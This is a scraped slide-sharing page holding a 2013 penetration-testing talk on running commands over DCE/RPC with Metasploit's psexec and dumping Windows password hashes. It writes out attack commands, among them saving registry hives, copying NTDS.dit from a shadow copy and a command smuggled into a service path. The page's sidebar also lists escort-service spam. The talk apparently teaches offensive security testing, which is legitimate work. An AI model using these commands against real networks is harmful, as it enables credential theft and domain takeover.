A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 

Recently uploaded (20)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

So you want to be a security expert

  • 1. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. So, You Want To Be A “Security Expert” Fun Tools For Penetration Testing
  • 2. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Husband & Father • Accuvant LABS: Senior Consultant • (A.K.A Pen Tester) • Cofounder: http://www.pentestgeek.com • Author: jigsaw.rb • Twitter: @R3dy__ Who Is Royce Davis?
  • 3. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Penetration Testing == Offensive Security • Uploading Shells Is No Good • Techniques to avoid shell upload • Metasploit Modules • Command execution • Local & Cached hash dumping • Fun With Domain Controllers What Are You Talking About?
  • 4. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Wikipedia Definition: • “a method of evaluating computer and network security by simulating an attack on a computer system or network from external and internal threats.” What Is A Pen Test? Not that kind of pen…
  • 5. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. The All Powerful Shell • What is a shell exactly?
  • 6. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • We‟ve been uploading shells to take control of remote hosts since the beginning of time so what‟s the big deal? • Shells contain binary signatures that can be recognized and blocked • Obfuscation only creates a different signature • Shells can die leaving us with no way back in • They can also leave remnants of themselves Uploading Shells Is No Good
  • 7. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Why bother with a shell in the first place? • Command execution • Search the file system • Create users • Enumerate network resources • Upload/download files • Etc… • Grab local/cached password hashes • Dump all AD hashes from the DC • “password” = 8846f7eaee8fb117ad06bdd830b7586c • How can we do stuff without a shell??? What Can We Do With A Shell?
  • 8. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. The Answer Is DCE/RPC Distributed Computing Environment / Remote Procedure Calls Book: DCE/RPC Over SMB – SAMBA and Windows NT* Domain Internals Author: Luke Kenneth Casson Leighton • Remotely interact with Windows API • Supported by all versions of Windows • Often left unsecured
  • 9. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Enter ‘psexec.rb’ • /exploit/windows/smb/psexec.rb • Creates & Uploads a binary payload to the target over SMB • Sends an RPC to the Service Control Manager (SCM) • UUID: „367abb81-9844-35f1-ad32-98f038001003‟ • Creates a service, starts it, cleans up after… • MSDN Documentation • http://msdn.microsoft.com/en- us/library/windows/desktop/ms685942%28v=vs.85%29.aspx Using Native Windows Functions
  • 10. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. DCERPC Requests: The dcerpc.call instance method takes in two parameters. The first parameter is the opcode reference to the particular Windows function you wish to call. The second parameter is the function arguments in NDR (Network Data Representation) Format. • dcerpc.call(0x0f, stubdata) – OpenSCManager • dcerpc.call(0x0c, stubdata) – CreateService • dcerpc.call(0x0, svc_handle) – CloseServiceHandle • dcerpc.call(0x10, stubdata) – OpenService • dcerpc.call(0x13, stubdata) – StartService • dcerpc.call(0x02, stubdata) – DeleteService • dcerpc.call(0x0, svc_handle) - CloseServiceHandle Inside psexec.rb
  • 11. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • This is what it looks like inside Metasploit‟s psexec exploit module written by HDM Psexec.rb Cont. exploit/windows/smb/psexec.rb (line 254)
  • 12. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • This is the format accepted by the CreateService function • http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450%28v=vs.85%29.aspx CreateService Windows Func.
  • 13. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • lpBinaryPathName [in, optional] • The fully qualified path to the service binary file. If the path contains a space, it must be quoted so that it is correctly interpreted. For example, "d:my sharemyservice.exe" should be specified as ""d:my sharemyservice.exe"". • The path can also include arguments for an auto-start service. For example, "d:mysharemyservice.exe arg1 arg2". These arguments are passed to the service entry point (typically the main function). • If you specify a path on another computer, the share must be accessible by the computer account of the local computer because this is the security context used in the remote call. However, this requirement allows any potential vulnerabilities in the remote computer to affect the local computer. Therefore, it is best to use a local file. • psexec.rb looks like this: • C:HjeKOplsYutVmBWn.exe  Probably a Meterpreter payload • What if we tried this instead: • C:windowssystem32cmd.exe /C echo dir C: ^> outputfile.txt > launchfile.bat & C:windowssystem32cmd.exe /C launchfile.bat” lpBinaryPathName MSDN Definition
  • 14. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. In order to provide accessibility to this functionality for other modules we created a mixin which has been graciously accepted into the MSF. lib/msf/core/exploit/smb/psexec.rb • Slightly modified version of the original psexec.rb code wrapped in a function which excepts a Windows command in the following format: • [PATH TO cmd.exe] [/C] [INSERT WINDOWS COMMAND] • The method is called like so „return psexec(command)‟ • Returns „true‟ if execution was successful • Major difference is it does not try to delete cmd.exe after execution • Also contains a „smb_read_file(smbshare, host, file)‟ method for convenient retrieval of command output The Psexec Mixin
  • 15. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Command Execution
  • 16. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Current methods for dumping password hashes • Post modules that require a meterpreter shell • Upload a standalone binary like pwdump/fgdump… • These methods extract specific registry key values from the SYSTEM, SECURITY, and/or SAM registry hive (This process can flag antivirus) • We need to somehow retrieve a copy of the registry hives and extract the hashes from them offline Dumping Password Hashes
  • 17. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. 1. Authenticate to the system using a password/hash 2. Use the psexec mixin to execute the following Windows Commands: • reg.exe save HKLMSAM c:windowstempsam • reg.exe save HKLMSYSTEM c:windowstempsys • reg.exe save HKLMSECURITY c:windowstempsec 3. Download the registry hive copies to our attacking machine 4. Remove the registry hive copies from the target 5. Open the registry hive copies on our attacking machine and extract the password hashes Offline Password Hash Dumping
  • 18. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Local & Cached Hash Extraction • Local Hashes • Domain Cached Hashes
  • 19. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • The holy grail of most network pentests can be found inside an ESE (Extensible Storage Engine) database called NTDS.dit located on the Domain Controller • Protected by operating system • Requires inject into lsass and/or other black magics • Contains a BOAT LOAD of information about the system • Including password hashes and usernames for all AD accounts! Dumping All the Hashes
  • 20. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. We can use the psexec_ntdsgrab module to create or target an existing VSC (Volume Shadow Copy) and safely pull down a copy of NTDS.dit to our attacking machine. auxiliary/admin/smb/psexec_ntdsgrab.rb 1. Use psexec mixin to execute windows commands for creating a VSC • vssadmin create shadow /For=%SYSTEMDRIVE% 2. Query vssadmin for the path to the newly created VSC • vssadmin list shadows 3. Copy NTDS.dit from the VSC to the WINDOWSTemp directory • copy /Y ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WINDOWSNTDSNTDS.dit C:WINDOWSTempntds 4. Use reg.exe to make a copy of the SYSTEM registry hive 5. Download the „ntds‟ and „sys‟ files to attacking machine 6. Cleanup after ourselves Enter psexec_ntdsgrab.rb
  • 21. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • We‟ll need to use the „libesedb‟ C library to extract the right tables from NTDS.dit • $ wget https://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz$ • $ tar xvzf libesedb-alpha-20120102.tar.gz • $ cd libesedb-20120102/ • $ ./configure • $ make && make install • Once libesedb is compiled we will use esedbexport located in the „libesedb-20120102/esedbtools‟ to export the datatable which contains the user account password hashes for AD • http://www.pentestgeek.com/2012/11/16/dumping-domain- password-hashes-using-metasploit-ntds_hashextract-rb/ Getting What We Want From NTDS.dit
  • 22. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. • Uploading a binary shell to the target can be harmful to a penetration test • DCERPC allows us to do a lot of the functions we would ask of a binary shell without uploading one to the target • Metasploit modules already exist to achieve remote command execution, grab local/cached password hashes and dump AD hashes from a DC • The sky is the limit as to what else we could do if we all chose to adapt this style of thinking Closing
  • 23. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Any Questions? 10/9/201322
  • 24. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. So, You Want To Be A “Security Expert” 10/9/201323 Thank You! Royce Davis Accuvant LABS Senior Consultant – Attack & Pen Team royce.e.davis@gmail.com http://www.pentestgeek.com @R3dy__

Editor's Notes

  1. 1.) My definition of a pen test is…2.)
  2. Transition into what can we do with a shell, why upload one in the first place?